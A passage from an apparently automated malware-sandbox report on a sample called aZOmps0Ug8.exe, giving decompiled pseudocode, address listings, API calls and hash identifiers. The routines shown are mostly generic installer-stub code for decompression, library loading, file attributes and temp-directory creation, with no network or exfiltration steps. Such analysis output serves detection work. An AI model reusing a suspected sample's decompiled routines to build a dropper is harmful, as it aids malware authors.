													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                        0x00000000
                        0x004064dd
                        0x004064dd
                        0x004064e1
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x00406840
                        0x00406840
                        0x00406843
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00406a5a
                        0x00406a62
                        0x00406a69
                        0x00406a6b
                        0x00406a72
                        0x00406a76
                        0x00406a76
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b3
                        0x004068b6
                        0x004068b6
                        0x004068bc
                        0x004068bc
                        0x00406058
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00000000
                        0x00406072
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060d1
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00406840
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061d4
                        0x004061d6
                        0x004061d9
                        0x0040624a
                        0x0040624d
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406840
                        0x004061db
                        0x004061df
                        0x004061e2
                        0x004061e4
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x004061fc
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406211
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406221
                        0x00406224
                        0x00406242
                        0x00406244
                        0x00000000
                        0x00406226
                        0x00406226
                        0x00406229
                        0x0040622c
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x00000000
                        0x0040623d
                        0x00000000
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406520
                        0x00406524
                        0x00000000
                        0x00000000
                        0x0040652a
                        0x0040652e
                        0x00000000
                        0x00000000
                        0x00406534
                        0x00406536
                        0x0040653a
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00000000
                        0x00000000
                        0x00406591
                        0x00406595
                        0x0040659c
                        0x0040659f
                        0x004065a2
                        0x004065ac
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406840
                        0x00406597
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x004065d2
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x004065db
                        0x004065db
                        0x004065de
                        0x004065e5
                        0x004065ea
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x0040626d
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x00000000
                        0x004069de
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00406292
                        0x00406292
                        0x00406295
                        0x00406298
                        0x00000000
                        0x00000000
                        0x0040629e
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d5
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x00406308
                        0x0040630a
                        0x0040630e
                        0x004062da
                        0x004062da
                        0x004062de
                        0x004062e6
                        0x004062eb
                        0x004062ed
                        0x004062ef
                        0x004062ef
                        0x00406311
                        0x00406318
                        0x0040631b
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406321
                        0x00000000
                        0x00406326
                        0x00406326
                        0x0040632a
                        0x004069ea
                        0x00000000
                        0x004069ea
                        0x00406330
                        0x00406333
                        0x00406336
                        0x0040633a
                        0x0040633d
                        0x00406343
                        0x00406345
                        0x00406345
                        0x00406345
                        0x00406348
                        0x0040634b
                        0x0040634b
                        0x0040634b
                        0x00406351
                        0x00000000
                        0x00000000
                        0x00406353
                        0x00406356
                        0x00406359
                        0x0040635c
                        0x0040635f
                        0x00406362
                        0x00406365
                        0x00406368
                        0x0040636b
                        0x0040636e
                        0x00406371
                        0x00406389
                        0x0040638c
                        0x0040638f
                        0x00406392
                        0x00406392
                        0x00406395
                        0x00406399
                        0x0040639b
                        0x00406373
                        0x00406373
                        0x0040637b
                        0x00406380
                        0x00406382
                        0x00406384
                        0x00406384
                        0x0040639e
                        0x004063a5
                        0x004063a8
                        0x00000000
                        0x004063aa
                        0x00000000
                        0x004063aa
                        0x004063a8
                        0x004063af
                        0x004063af
                        0x004063af
                        0x004063af
                        0x00000000
                        0x00000000
                        0x004063ea
                        0x004063ea
                        0x004063ee
                        0x004069f6
                        0x00000000
                        0x004069f6
                        0x004063f4
                        0x004063f7
                        0x004063fa
                        0x004063fe
                        0x00406401
                        0x00406407
                        0x00406409
                        0x00406409
                        0x00406409
                        0x0040640c
                        0x0040640f
                        0x0040640f
                        0x00406415
                        0x004063b3
                        0x004063b3
                        0x004063b6
                        0x00000000
                        0x004063b6
                        0x00406417
                        0x00406417
                        0x0040641a
                        0x0040641d
                        0x00406420
                        0x00406423
                        0x00406426
                        0x00406429
                        0x0040642c
                        0x0040642f
                        0x00406432
                        0x00406435
                        0x0040644d
                        0x00406450
                        0x00406453
                        0x00406456
                        0x00406456
                        0x00406459
                        0x0040645d
                        0x0040645f
                        0x00406437
                        0x00406437
                        0x0040643f
                        0x00406444
                        0x00406446
                        0x00406448
                        0x00406448
                        0x00406462
                        0x00406469
                        0x0040646c
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x0040646e
                        0x00000000
                        0x004066fb
                        0x004066fb
                        0x004066ff
                        0x00406a26
                        0x00000000
                        0x00406a26
                        0x00406705
                        0x00406708
                        0x0040670b
                        0x0040670f
                        0x00406712
                        0x00406718
                        0x0040671a
                        0x0040671a
                        0x0040671a
                        0x0040671d
                        0x00000000
                        0x00000000
                        0x004064cb
                        0x004064cb
                        0x004064ce
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00000000
                        0x0040680a
                        0x0040680e
                        0x00406830
                        0x00406833
                        0x0040683d
                        0x00406840
                        0x00406840
                        0x00000000
                        0x00406840
                        0x00406840
                        0x00406810
                        0x00406813
                        0x00406817
                        0x0040681a
                        0x0040681a
                        0x0040681d
                        0x00000000
                        0x00000000
                        0x004068c7
                        0x004068cb
                        0x004068e9
                        0x004068e9
                        0x004068e9
                        0x004068f0
                        0x004068f7
                        0x004068fe
                        0x004068fe
                        0x00000000
                        0x004068fe
                        0x004068cd
                        0x004068d0
                        0x004068d3
                        0x004068d6
                        0x004068dd
                        0x00406821
                        0x00406821
                        0x00406824
                        0x00000000
                        0x00000000
                        0x004069b8
                        0x004069bb
                        0x004068bc
                        0x00000000
                        0x00000000
                        0x004065f2
                        0x004065f4
                        0x004065fb
                        0x004065fc
                        0x004065fe
                        0x00406601
                        0x00000000
                        0x00000000
                        0x00406609
                        0x0040660c
                        0x0040660f
                        0x00406611
                        0x00406613
                        0x00406613
                        0x00406614
                        0x00406617
                        0x0040661e
                        0x00406621
                        0x0040662f
                        0x00000000
                        0x00000000
                        0x00406905
                        0x00406905
                        0x00406908
                        0x0040690f
                        0x00000000
                        0x00000000
                        0x00406914
                        0x00406914
                        0x00406918
                        0x00406a50
                        0x00000000
                        0x00406a50
                        0x0040691e
                        0x00406921
                        0x00406924
                        0x00406928
                        0x0040692b
                        0x00406931
                        0x00406933
                        0x00406933
                        0x00406933
                        0x00406936
                        0x00406939
                        0x00406939
                        0x00406939
                        0x00406939
                        0x0040693c
                        0x0040693c
                        0x00406940
                        0x004069a0
                        0x004069a3
                        0x004069a8
                        0x004069a9
                        0x004069ab
                        0x004069ad
                        0x004069b0
                        0x004068bc
                        0x004068bc
                        0x00000000
                        0x004068c2
                        0x004068bc
                        0x00406942
                        0x00406948
                        0x0040694b
                        0x0040694e
                        0x00406951
                        0x00406954
                        0x00406957
                        0x0040695a
                        0x0040695d
                        0x00406960
                        0x00406963
                        0x0040697c
                        0x0040697f
                        0x00406982
                        0x00406985
                        0x00406989
                        0x0040698b
                        0x0040698b
                        0x0040698c
                        0x0040698f
                        0x00406965
                        0x00406965
                        0x0040696d
                        0x00406972
                        0x00406974
                        0x00406977
                        0x00406977
                        0x00406992
                        0x00406999
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x0040699b
                        0x00000000
                        0x00406637
                        0x0040663a
                        0x00406670
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a0
                        0x004067a3
                        0x004067a3
                        0x004067a6
                        0x004067a8
                        0x00406a32
                        0x00000000
                        0x00406a32
                        0x004067ae
                        0x004067b1
                        0x00000000
                        0x00000000
                        0x004067b7
                        0x004067bb
                        0x004067be
                        0x004067be
                        0x004067be
                        0x00000000
                        0x004067be
                        0x0040663c
                        0x0040663e
                        0x00406640
                        0x00406642
                        0x00406645
                        0x00406646
                        0x00406648
                        0x0040664a
                        0x0040664d
                        0x00406650
                        0x00406666
                        0x0040666b
                        0x004066a3
                        0x004066a3
                        0x004066a7
                        0x004066d3
                        0x004066d5
                        0x004066dc
                        0x004066df
                        0x004066e2
                        0x004066e2
                        0x004066e7
                        0x004066e7
                        0x004066e9
                        0x004066ec
                        0x004066f3
                        0x004066f6
                        0x00406723
                        0x00406723
                        0x00406726
                        0x00406729
                        0x0040679d
                        0x0040679d
                        0x0040679d
                        0x00000000
                        0x0040679d
                        0x0040672b
                        0x00406731
                        0x00406734
                        0x00406737
                        0x0040673a
                        0x0040673d
                        0x00406740
                        0x00406743
                        0x00406746
                        0x00406749
                        0x0040674c
                        0x00406765
                        0x00406767
                        0x0040676a
                        0x0040676b
                        0x0040676e
                        0x00406770
                        0x00406773
                        0x00406775
                        0x00406777
                        0x0040677a
                        0x0040677c
                        0x0040677f
                        0x00406783
                        0x00406785
                        0x00406785
                        0x00406786
                        0x00406789
                        0x0040678c
                        0x0040674e
                        0x0040674e
                        0x00406756
                        0x0040675b
                        0x0040675d
                        0x00406760
                        0x00406760
                        0x0040678f
                        0x00406796
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00406720
                        0x00000000
                        0x00406798
                        0x00000000
                        0x00406798
                        0x00406796
                        0x004066a9
                        0x004066ac
                        0x004066ae
                        0x004066b1
                        0x004066b4
                        0x004066b7
                        0x004066b9
                        0x004066bc
                        0x004066bf
                        0x004066bf
                        0x004066c2
                        0x004066c2
                        0x004066c5
                        0x004066cc
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x004066a0
                        0x00000000
                        0x004066ce
                        0x00000000
                        0x004066ce
                        0x004066cc
                        0x00406652
                        0x00406655
                        0x00406657
                        0x0040665a
                        0x00000000
                        0x00000000
                        0x004063b9
                        0x004063b9
                        0x004063bd
                        0x00406a02
                        0x00000000
                        0x00406a02
                        0x004063c3
                        0x004063c6
                        0x004063c9
                        0x004063cc
                        0x004063cf
                        0x004063d2
                        0x004063d5
                        0x004063d7
                        0x004063da
                        0x004063dd
                        0x004063e0
                        0x004063e2
                        0x004063e2
                        0x004063e2
                        0x00000000
                        0x00000000
                        0x00406544
                        0x00406544
                        0x00406548
                        0x00406a0e
                        0x00000000
                        0x00406a0e
                        0x0040654e
                        0x00406551
                        0x00406554
                        0x00406557
                        0x00406559
                        0x00406559
                        0x00406559
                        0x0040655c
                        0x0040655f
                        0x00406562
                        0x00406565
                        0x00406568
                        0x0040656b
                        0x0040656c
                        0x0040656e
                        0x0040656e
                        0x0040656e
                        0x00406571
                        0x00406574
                        0x00406577
                        0x0040657a
                        0x0040657a
                        0x0040657a
                        0x0040657d
                        0x0040657f
                        0x0040657f
                        0x00000000
                        0x00000000
                        0x004067c1
                        0x004067c1
                        0x004067c1
                        0x004067c5
                        0x00000000
                        0x00000000
                        0x004067cb
                        0x004067ce
                        0x004067d1
                        0x004067d4
                        0x004067d6
                        0x004067d6
                        0x004067d6
                        0x004067d9
                        0x004067dc
                        0x004067df
                        0x004067e2
                        0x004067e5
                        0x004067e8
                        0x004067e9
                        0x004067eb
                        0x004067eb
                        0x004067eb
                        0x004067ee
                        0x004067f1
                        0x004067f4
                        0x004067f7
                        0x004067fa
                        0x004067fe
                        0x00406800
                        0x00406803
                        0x00000000
                        0x00406805
                        0x00406582
                        0x00406582
                        0x00000000
                        0x00406582
                        0x00406803
                        0x00406a38
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00406a6f
                        0x00406a6f
                        0x00000000
                        0x00406a6f
                        0x004068bc
                        0x00406843
                        0x00406840

                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                        • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                        • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                        • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423f70; // 0x5724f4
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}












                        0x0040138a
                        0x004013fa
                        0x00401392
                        0x0040139b
                        0x004013a0
                        0x00000000
                        0x00000000
                        0x004013a2
                        0x004013a3
                        0x004013ad
                        0x00000000
                        0x00401404
                        0x004013b0
                        0x004013b7
                        0x004013bd
                        0x004013be
                        0x004013c0
                        0x004013c2
                        0x004013b9
                        0x004013b9
                        0x004013ba
                        0x004013ba
                        0x004013c9
                        0x004013cb
                        0x004013f4
                        0x004013f4
                        0x004013c9
                        0x00000000

                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                        • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                        • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                        • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                        0x00405f30
                        0x00405f33
                        0x00405f3a
                        0x00405f42
                        0x00405f4e
                        0x00000000
                        0x00405f55
                        0x00405f45
                        0x00405f4c
                        0x00000000
                        0x00405f5d
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                          • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                          • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                          • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                        • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                        • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                        • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                        0x00405873
                        0x00405880
                        0x00405895
                        0x0040589b

                        APIs
                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\aZOmps0Ug8.exe,80000000,00000003), ref: 00405873
                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                        • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                        • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                        • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                        0x00405854
                        0x0040585d
                        0x00000000
                        0x00405866
                        0x0040586c

                        APIs
                        • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                        • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                        • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                        • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                        0x004053c9
                        0x004053d1
                        0x00000000
                        0x004053d7
                        0x00000000

                        APIs
                        • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                        • GetLastError.KERNEL32 ref: 004053D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                        • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                        • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403081(void* _a4, long _a8) {
